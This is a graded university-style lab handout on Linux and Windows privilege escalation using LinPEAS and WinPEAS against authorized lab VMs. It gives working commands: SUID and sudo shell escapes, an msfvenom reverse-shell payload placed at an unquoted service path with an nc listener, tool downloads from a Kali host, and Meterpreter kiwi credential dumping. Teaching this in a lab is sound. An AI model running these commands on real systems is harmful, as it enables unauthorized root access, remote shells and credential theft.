Week 9 graded lab. Linux (LinPEAS) + Windows (WinPEAS). Authorized lab VMs only.
Learning objectives
- Obtain an initial low-privilege shell and determine the escalation surface
- Run LinPEAS and WinPEAS and interpret their output by technique family
- Execute at least one Linux and one Windows privilege escalation to achieve root / SYSTEM
- Produce a lab report with annotated tool output and proof screenshots
Authorization
Targets:
- Metasploitable 2 (Linux privesc exercises)
- Instructor-provided Windows lab VM (Windows privesc exercises)
All targets are authorized lab VMs. Do not apply these techniques to any other system.
Linux privilege escalation (Metasploitable 2)
Step 1: Initial foothold
Obtain a shell on Metasploitable 2. Use any technique from Lab 7 (vsftpd backdoor, UnrealIRCd, Samba). The initial shell privilege level will be either a specific service user or an interactive user account.
Confirm the initial privilege:
id
whoami
uname -a
hostname
Note: Some Lab 7 exploits (vsftpd, UnrealIRCd backdoors) give root directly. If your initial shell is already root, use a different Lab 7 technique that gives a lower-privileged shell, or manually drop to a user account:
# From root shell, switch to low-privilege user:
su msfadmin
id # should show uid=1000(msfadmin)
Step 2: Transfer and run LinPEAS
LinPEAS is on Kali at /usr/share/peass/linpeas/linpeas.sh (install with sudo apt install peass -y if missing).
Transfer to the target:
# On Kali: serve LinPEAS over HTTP
python3 -m http.server 8080 --directory /usr/share/peass/linpeas/
# On target (in your shell):
cd /tmp
wget http://<kali-ip>:8080/linpeas.sh
chmod +x linpeas.sh
Run LinPEAS and capture full output:
./linpeas.sh | tee linpeas-output.txt
LinPEAS runs for several minutes. Do not interrupt it.
Step 3: Interpret LinPEAS output
LinPEAS color-codes findings:
- Red/bold: high-severity escalation paths
- Yellow: medium-severity
- Blue/bold: interesting system information
For each red finding, identify its technique family:
| LinPEAS category | Technique family | Escalation path description |
|---|---|---|
| SUID binaries | SUID abuse | Binary runs as root; use GTFOBins to find shell escape |
| Sudo rights | sudo misconfiguration | Binary executable without password via sudo; use GTFOBins |
| Cron jobs | Writable cron script | Root cron job references a file the current user can write |
| Files with capabilities | Linux capabilities | Capability like cap_setuid allows uid manipulation |
| Writable files | Path hijacking or script injection | Writable file executed by a higher-privilege process |
Document: For each red finding, write one row in the following table:
| LinPEAS finding | Technique family | Escalation path | Confidence (High/Med/Low) |
|---|---|---|---|
| nmap has SUID bit | SUID abuse | GTFOBins: nmap --interactive; !sh gives root shell |
High |
| ... | ... | ... | ... |
Step 4: Execute the escalation
Choose the highest-confidence escalation path and execute it. Common options on Metasploitable 2:
SUID nmap (if present):
# Check: ls -la $(which nmap)
# If SUID: -rwsr-xr-x root root
nmap --interactive
nmap> !sh
# New shell: run id -- should show uid=0(root)
SUID find (if present):
find / -name "flag.txt" -exec /bin/sh \;
# If find has SUID, the -exec command runs as root
Sudo Python (if sudo allows python without password):
sudo python3 -c 'import os; os.system("/bin/bash")'
Proof screenshot: id showing uid=0(root).
Windows privilege escalation (Instructor-provided lab VM)
Pre-requisite
The instructor provides an RDP connection or a low-privilege shell to a Windows lab VM. The lab VM has at least one intentional privilege escalation path.
Step 1: Establish session
Connect to the Windows VM with the provided low-privilege credentials. Verify the initial privilege:
whoami
whoami /priv
net user %username%
Step 2: Transfer and run WinPEAS
Option A -- via Meterpreter:
# From a Meterpreter session:
meterpreter > upload /usr/share/peass/winpeas/winPEASany.exe C:\\Windows\\Temp\\winpeas.exe
meterpreter > shell
C:\Windows\Temp\winpeas.exe -ansi | tee C:\Windows\Temp\winpeas-output.txt
Option B -- via HTTP download on the target:
powershell -c "Invoke-WebRequest http://<kali-ip>:8080/winPEASany.exe -OutFile C:\Temp\winpeas.exe"
C:\Temp\winpeas.exe -ansi > C:\Temp\winpeas-output.txt
Step 3: Interpret WinPEAS output
WinPEAS highlights critical findings in red. For each critical finding, identify the technique family:
| WinPEAS finding category | Technique family |
|---|---|
| Unquoted service paths | Path interception |
| Modifiable services / binaries | Service binary overwrite |
| AlwaysInstallElevated | MSI installer escalation |
| Interesting privileges (SeImpersonate) | Token impersonation |
| Stored credentials | Credential reuse |
Document: Same table format as the Linux section.
Step 4: Execute the escalation
Execute one Windows escalation path to achieve SYSTEM.
Example: Unquoted service path (if present)
# WinPEAS identifies: C:\Program Files\Vulnerable Service\sub dir\service.exe
# The space in "sub dir" and the unquoted path means Windows may execute:
# C:\Program.exe (if exists) or C:\Program Files\Vulnerable.exe (if exists)
# Create a payload:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<kali-ip> LPORT=4444 -f exe -o "C:\Program Files\Vulnerable.exe"
# Set up listener on Kali:
nc -lvnp 4444
# Restart the service on Windows (if you have that privilege):
sc stop VulnService
sc start VulnService
Proof screenshot: whoami showing nt authority\system (or equivalent administrator-level output from the shell).
Step 5 (bonus): Credential extraction
From a SYSTEM Meterpreter session:
meterpreter > load kiwi
meterpreter > creds_all
Document what credential material is accessible (NTLM hashes, plaintext passwords if WDigest is enabled). Do not include real credential values in any document outside the private lab Git repo.
Deliverable
A lab report with two sections (Linux and Windows).
Each section:
- Initial foothold description (how you obtained the first shell; privilege level)
- LinPEAS / WinPEAS summary table (annotated -- not raw tool output)
- Successful escalation steps (step-by-step from the low-privilege state to root/SYSTEM; copy from session log)
- Proof screenshot
- Business impact paragraph: what does root/SYSTEM access on this host enable an attacker to do, in client-addressable terms?
Appendix: linpeas-output.txt and winpeas-output.txt (raw output for grader reference).